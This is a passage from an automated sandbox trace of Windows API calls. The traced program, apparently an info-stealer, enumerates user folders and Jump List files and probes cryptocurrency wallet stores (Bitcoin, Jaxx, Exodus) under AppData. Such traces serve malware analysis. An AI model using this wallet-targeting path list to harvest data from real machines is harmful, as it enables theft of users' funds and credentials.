ftLastWriteTime.dwHighDateTime=0x1d72469, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 1 [0220.301] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76beed20, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x76beed20, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76beed20, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fb3b0dbfee58fac8.automaticDestinations-ms", cAlternateFileName="FB3B0D~1.AUT")) returned 1 [0220.330] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0x304 [0220.347] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0x304 [0220.470] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0x304 [0220.472] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents" (normalized: "c:\\users\\keecfmwgj\\documents"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0x304 [0220.473] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\Application Data" (normalized: "c:\\users\\keecfmwgj\\local settings\\application data"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0x304 [0220.475] DeviceIoControl (in: hDevice=0x304, dwIoControlCode=0x900a8, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x279cac, nOutBufferSize=0x4000, lpBytesReturned=0x279c60, lpOverlapped=0x0 | out: lpOutBuffer=0x279cac*, lpBytesReturned=0x279c60*=0x9c, lpOverlapped=0x0) returned 1 [0220.475] CloseHandle (hObject=0x304) returned 1 [0220.475] GetProcessHeap () returned 0x2b0000 [0220.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfd98 [0220.475] GetProcessHeap () returned 0x2b0000 [0220.475] GetProcessHeap () returned 0x2b0000 [0220.475] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\Application Data" (normalized: "c:\\users\\keecfmwgj\\local settings\\application data"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x304 [0220.476] GetProcessHeap () returned 0x2b0000 [0220.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40d0 | out: hHeap=0x2b0000) returned 1 [0220.476] GetFileInformationByHandle (in: hFile=0x304, lpFileInformation=0x279b10 | out: lpFileInformation=0x279b10) returned 1 [0220.476] CloseHandle (hObject=0x304) returned 1 [0220.476] GetProcessHeap () returned 0x2b0000 [0220.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x32) returned 0x2eb4a8 [0220.476] GetProcessHeap () returned 0x2b0000 [0220.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x32) returned 0x2eb4e8 [0220.476] GetProcessHeap () returned 0x2b0000 [0220.482] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x64) returned 0x2d60e0 [0220.484] GetProcessHeap () returned 0x2b0000 [0220.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfd98 [0220.485] GetProcessHeap () returned 0x2b0000 [0220.485] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfd98, Size=0x38) returned 0x2eb4e8 [0220.485] GetProcessHeap () returned 0x2b0000 [0220.485] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x70) returned 0x2d40d0 [0220.485] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\Application Data\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0220.490] GetLastError () returned 0x5 [0220.490] GetProcessHeap () returned 0x2b0000 [0220.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40d0 | out: hHeap=0x2b0000) returned 1 [0220.490] GetProcessHeap () returned 0x2b0000 [0220.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d60e0 | out: hHeap=0x2b0000) returned 1 [0220.491] GetProcessHeap () returned 0x2b0000 [0220.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0220.491] GetProcessHeap () returned 0x2b0000 [0220.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x32) returned 0x2eb4a8 [0220.491] GetProcessHeap () returned 0x2b0000 [0220.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a0) returned 0x3052b8 [0220.491] GetProcessHeap () returned 0x2b0000 [0220.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb428 | out: hHeap=0x2b0000) returned 1 [0220.491] GetProcessHeap () returned 0x2b0000 [0220.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0220.491] GetProcessHeap () returned 0x2b0000 [0220.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3052b8 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5268 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4b8 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5298 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5280 | out: hHeap=0x2b0000) returned 1 [0220.493] GetProcessHeap () returned 0x2b0000 [0220.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb3e8 | out: hHeap=0x2b0000) returned 1 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f51d8 | out: hHeap=0x2b0000) returned 1 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x19) returned 0x2cfd98 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x5) returned 0x2f0880 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfca8 [0220.494] GetProcessHeap () returned 0x2b0000 [0220.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x19) returned 0x2cfd70 [0220.495] GetProcessHeap () returned 0x2b0000 [0220.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0870 [0220.495] GetProcessHeap () returned 0x2b0000 [0220.495] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0xc) returned 0x2f51d8 [0220.495] GetProcessHeap () returned 0x2b0000 [0220.495] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f51d8, Size=0x18) returned 0x2cf0f0 [0220.495] SetLastError (dwErrCode=0x0) [0220.495] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.495] GetProcessHeap () returned 0x2b0000 [0220.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.495] GetProcessHeap () returned 0x2b0000 [0220.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.495] GetProcessHeap () returned 0x2b0000 [0220.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4b8 [0220.495] GetProcessHeap () returned 0x2b0000 [0220.495] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4b8, Size=0x44) returned 0x2c69a0 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd70 | out: hHeap=0x2b0000) returned 1 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfca8 | out: hHeap=0x2b0000) returned 1 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x32) returned 0x2eb3e8 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfd98 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfd98, Size=0x38) returned 0x2eb4a8 [0220.496] GetProcessHeap () returned 0x2b0000 [0220.496] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2d40d0 [0220.496] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Bitcoin\\wallets" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bitcoin\\wallets"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.497] GetLastError () returned 0x3 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40d0 | out: hHeap=0x2b0000) returned 1 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x32) returned 0x2eb4a8 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb3e8 | out: hHeap=0x2b0000) returned 1 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f51d8 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0880 | out: hHeap=0x2b0000) returned 1 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x3022b8 [0220.497] GetProcessHeap () returned 0x2b0000 [0220.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2c7908 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0880 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0880, Size=0x3) returned 0x2f0870 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfd98 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2c78c0 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0880 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0880, Size=0xc) returned 0x2f5280 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5280, Size=0x18) returned 0x2cf0f0 [0220.498] SetLastError (dwErrCode=0x0) [0220.498] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.498] GetProcessHeap () returned 0x2b0000 [0220.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.499] GetProcessHeap () returned 0x2b0000 [0220.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.499] GetProcessHeap () returned 0x2b0000 [0220.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4b8 [0220.499] GetProcessHeap () returned 0x2b0000 [0220.499] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4b8, Size=0x57) returned 0x2e1620 [0220.499] GetProcessHeap () returned 0x2b0000 [0220.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c78c0 | out: hHeap=0x2b0000) returned 1 [0220.499] GetProcessHeap () returned 0x2b0000 [0220.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.499] GetProcessHeap () returned 0x2b0000 [0220.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.499] GetProcessHeap () returned 0x2b0000 [0220.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c7908 | out: hHeap=0x2b0000) returned 1 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x57) returned 0x2e1680 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2e) returned 0x2ec3f0 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec3f0, Size=0x5c) returned 0x302320 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x302320, Size=0xb8) returned 0x2e6040 [0220.500] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\com.liberty.jaxx\\indexeddb\\file__0.indexeddb.leveldb"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.500] GetLastError () returned 0x3 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x57) returned 0x2e16e0 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e1680 | out: hHeap=0x2b0000) returned 1 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e16e0 | out: hHeap=0x2b0000) returned 1 [0220.500] GetProcessHeap () returned 0x2b0000 [0220.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4) returned 0x2f0880 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e1620 | out: hHeap=0x2b0000) returned 1 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0870 | out: hHeap=0x2b0000) returned 1 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2cfd98 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x3) returned 0x2f08a0 [0220.501] GetProcessHeap () returned 0x2b0000 [0220.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfca8 [0220.502] GetProcessHeap () returned 0x2b0000 [0220.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2cfd70 [0220.502] GetProcessHeap () returned 0x2b0000 [0220.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0870 [0220.502] GetProcessHeap () returned 0x2b0000 [0220.502] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0xc) returned 0x2f5280 [0220.502] GetProcessHeap () returned 0x2b0000 [0220.502] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5280, Size=0x18) returned 0x2cf0f0 [0220.502] SetLastError (dwErrCode=0x0) [0220.502] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.502] GetProcessHeap () returned 0x2b0000 [0220.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.502] GetProcessHeap () returned 0x2b0000 [0220.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.502] GetProcessHeap () returned 0x2b0000 [0220.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4b8 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4b8, Size=0x44) returned 0x2c69a0 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd70 | out: hHeap=0x2b0000) returned 1 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfca8 | out: hHeap=0x2b0000) returned 1 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x37) returned 0x2eb4a8 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2cfd98 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfd98, Size=0x3c) returned 0x2c7908 [0220.503] GetProcessHeap () returned 0x2b0000 [0220.503] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x78) returned 0x2c0b20 [0220.503] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\exodus\\exodus.wallet"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.504] GetLastError () returned 0x3 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0b20 | out: hHeap=0x2b0000) returned 1 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x37) returned 0x2eb3e8 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb3e8 | out: hHeap=0x2b0000) returned 1 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0870 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08a0 | out: hHeap=0x2b0000) returned 1 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.504] GetProcessHeap () returned 0x2b0000 [0220.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x27) returned 0x2dc458 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08a0 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08a0, Size=0x3) returned 0x2f08b0 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfd98 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x27) returned 0x2dc4b8 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08a0 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08a0, Size=0xc) returned 0x2f5280 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5280, Size=0x18) returned 0x2cf0f0 [0220.505] SetLastError (dwErrCode=0x0) [0220.505] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.505] GetProcessHeap () returned 0x2b0000 [0220.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0220.506] GetProcessHeap () returned 0x2b0000 [0220.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.506] GetProcessHeap () returned 0x2b0000 [0220.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc548 [0220.506] GetProcessHeap () returned 0x2b0000 [0220.506] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc548, Size=0x44) returned 0x2c69a0 [0220.506] GetProcessHeap () returned 0x2b0000 [0220.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4b8 | out: hHeap=0x2b0000) returned 1 [0220.506] GetProcessHeap () returned 0x2b0000 [0220.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0220.506] GetProcessHeap () returned 0x2b0000 [0220.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.506] GetProcessHeap () returned 0x2b0000 [0220.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.506] 